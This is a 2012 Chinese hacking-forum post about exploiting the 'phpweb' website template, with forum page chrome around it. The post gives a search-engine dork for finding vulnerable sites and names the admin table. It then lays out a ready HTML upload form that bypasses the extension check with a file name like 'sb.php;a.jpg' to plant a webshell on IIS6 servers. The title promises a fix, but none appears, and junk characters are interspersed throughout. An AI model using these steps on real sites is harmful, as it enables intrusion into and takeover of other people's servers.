找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2108|回复: 0
打印 上一主题 下一主题

phpweb成品网站全版本通杀注入漏洞及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:52:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
关键字:inurl:webmall/detail.php?id
6 C4 C% ^& m; K3 W0 W( n4 E1 u$ ^  v+ T( s
数据表:pwn_base_admin8 y# C0 {, U. z6 W4 M

9 E- b; X9 e2 y; W; @* G- B- n6 N关于拿shell+ E; t% k+ m3 p  z" Q- F' \" ^
. T* f' N! ~* s, D) b. a
首先登录后台admin.php
5 n5 T/ U: K7 e5 r% z
1 H& L* x8 R4 n$ G2 F7 E看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
0 a  z: |& X# |2 F: v. i5 Z换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
0 R" u  P2 I. l  r" t2 q5 M然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
- E$ C  `( x& ?* m, d! \! E. @<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> $ k- A( N# ]* ?  D1 ^1 t
<input type="text" name="fileName" value="sb.php;a.jpg" />
0 Y- P, W5 {: W% j7 o<input type="hidden" name="attachPath" value="news/pics/" />
% Q( C: D8 _1 C- S<input type="file" name="fileData" size="14" /></td> ; d$ S  H7 s) m0 [. a( _% \4 B
<input type="submit" name="button" value="确定" /> ) J2 ]4 s& a$ k2 ^# ^, s, q" @8 n' Z
</form>7 R; F9 Z5 W# v5 L4 A

* [' `- K+ a) |4 h首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
( F% o- K! W/ R6 u5 O
: p. G# a6 I! P$ m1 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表